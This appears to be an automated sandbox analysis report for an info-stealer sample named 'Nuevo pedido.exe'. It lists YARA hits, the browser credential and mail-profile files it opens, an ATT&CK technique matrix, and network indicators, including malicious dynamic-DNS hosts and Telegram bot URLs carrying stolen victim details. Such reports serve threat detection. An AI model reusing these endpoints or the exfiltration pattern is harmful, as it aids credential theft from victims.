                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Users\user\Desktop\Nuevo pedido.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR
                  Source: Yara matchFile source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4135978280.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR
                  Source: Yara matchFile source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7764, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  1
                  Exfiltration Over Alternative Protocol
                  Abuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Scheduled Task/Job
                  112
                  Process Injection
                  3
                  Obfuscated Files or Information
                  LSASS Memory13
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Scheduled Task/Job
                  2
                  Software Packing
                  Security Account Manager1
                  Query Registry
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS11
                  Security Software Discovery
                  Distributed Component Object Model1
                  Clipboard Data
                  1
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials31
                  Virtualization/Sandbox Evasion
                  VNCGUI Input Capture24
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
                  Process Injection
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586800 Sample: Nuevo pedido.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 2 other IPs or domains 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 13 other signatures 2->68 8 Nuevo pedido.exe 7 2->8         started        12 QGVhHsAOjb.exe 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...\QGVhHsAOjb.exe, PE32 8->38 dropped 40 C:\Users\...\QGVhHsAOjb.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp56AD.tmp, XML 8->42 dropped 44 C:\Users\user\...44uevo pedido.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 Nuevo pedido.exe 15 2 8->14         started        18 powershell.exe 21 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 22 QGVhHsAOjb.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 52 50.31.176.103, 21, 32059, 49777 SERVERCENTRALUS United States 14->52 54 api.telegram.org 149.154.167.220, 443, 49763, 49775 TELEGRAMRU United Kingdom 14->54 56 2 other IPs or domains 14->56 78 Tries to steal Mail credentials (via file / registry access) 14->78 80 Tries to harvest and steal browser information (history, passwords, etc) 14->80 82 Loading BitLocker PowerShell Module 18->82 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Nuevo pedido.exe45%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                  Nuevo pedido.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe45%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://anotherarmy.dns.army:8081100%Avira URL Cloudphishing
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
                  http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
                  http://varders.kozow.com:8081100%Avira URL Cloudmalware
                  http://aborters.duckdns.org:8081100%Avira URL Cloudphishing
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  104.21.16.1
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      193.122.130.0
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:42:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:22:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.fontbureau.com/designersGNuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers/?Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
